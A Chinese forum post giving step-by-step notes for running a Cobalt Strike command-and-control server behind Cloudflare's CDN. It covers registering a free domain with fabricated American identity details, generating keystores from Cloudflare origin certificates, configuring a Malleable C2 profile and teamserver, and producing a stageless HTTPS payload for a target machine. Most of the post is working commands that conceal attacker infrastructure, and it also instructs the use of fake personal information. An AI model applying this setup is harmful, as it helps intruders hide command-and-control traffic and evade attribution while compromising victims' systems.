-
-
[原创]cobalt strike cdn上线笔记
-
发表于: 2022-3-10 15:16 4409
-
cobalt strike cdn上线笔记
免费域名注册:https://www.freenom.com/zh/index.html?lang=zh
CDN: https://dash.cloudflare.com/
CS版本: cobalt strike4.4
一、 新域名注册
1、打开freenom进行新域名注册,先输入想要注册的域名,再检查其可用性。
2、点击完成,修改 Period为12个月,更长时间就需要付费。
3、进入账号注册页面,这里需要挂VPN,可以选择谷歌账号登录或者通过其他邮箱注册。
4、邮箱会收到freenom发来的确认邮件,点击邮件内容中的链接来到资料填写页面。
5、由于填写的资料需与当前网络信息一致,可以先查询当前VPN的IP归属地(做好是美国),再使用好维持(http://www.haoweichi.com/
)生成美国人虚拟信息,州全称也需和IP归属的州名称一致。
6.根据虚拟信息填写对应资料,提交出现以下页面则注册成功。
二、 CDN注册
1.打开cloudflare(https://dash.cloudflare.com)进行账号注册,注册成功直接添加freenom注册的免费域名。
2.选择免费计划。
3.添加DNS解析记录。
4.复制Cloudflare名称服务器地址。
5.登录freenom,打开My Domains->Manage Domain->Management Tools->Nameservers,选择Use custom nameservers (enter below),填写名称服务器。
6.自动配置全部选择关闭
7.概述显示“好消息!Cloudflare 正在保护您的站点”则配置成功。
三、cobalt strike https上线
1、打开Cloudflare,配置SSL/TLS加密模式为完全。
2、配置缓存,开启Always Online及开发模式。
3、打开SSL/TLS的源服务器创建源证书。
4、创建使用Cloudflare生成私钥和CSR,复制出源证书及私钥,保存为server.pem和server.key文件。
5、 使用以下命令重新生成store格式配置文件。
1、生成.p12格式文件
1 | openssl pkcs12 - export - in server.pem - inkey server.key - out spoofdomain.p12 - name 域名 - passout pass :密码 |
例子
1 | openssl pkcs12 - export - in server.pem - inkey server.key - out spoofdomain.p12 - name zh.xxxxx.tk - passout pass :pasa1234 |
2、生成.store格式文件
1 | keytool - importkeystore - deststorepass 密码 - destkeypass 密码 - destkeystore cs.store - srckeystore spoofdomain.p12 - srcstoretype PKCS12 - srcstorepass 密码 - alias 域名 |
例子
1 | keytool - importkeystore - deststorepass pasa1234 - destkeypass pasa1234 - destkeystore cs.store - srckeystore spoofdomain.p12 - srcstoretype PKCS12 - srcstorepass pasa1234 - alias zh.xxxxx.tk |
6、C2.profile配置
使用以下项目
https://github.com/rsmudge/Malleable-C2-Profiles
在profile文件中添加以下配置。
1 2 3 4 | https - certificate { set keystore " cs.store " ; set password "pasa1234" ; } |
7、 使用c2lint工具检测profile文件是否可用。不发生报错则可用。
1 | . / c2lint havex.profile |
8、 修改teamserver配置文件
1 | javax.net.ssl.keyStore = . / cs.store路径 - Djavax.net.ssl.keyStorePassword = 证书密码 |
例子
1 | javax.net.ssl.keyStore = . / cs.store - Djavax.net.ssl.keyStorePassword = pasa1234 |
9、 启动cobalt strike
1 | . / teamserver 服务器IP 密码 . / havex.profile文件路径 |
1 | . / teamserver 192.168 . 1.1 mimatest . / havex.profile |
10、 配置https监听器
Cloudflare只支持监听以下端口:
Cloudflare支持的HTTP端口是:80,8080,8880,2052,2082,2086,2095
Cloudflare支持的HTTPs端口是:443,2053,2083,2087,2096,8443
如果VPS是国内云主机,且注册的免费域名没有备案,则不能使用80、8080、443、8443端口提供服务。以下使用的是2096端口。
11、 生成一个Stageless Payload,勾选启用https。
12、目标靶机执行,成功https上线。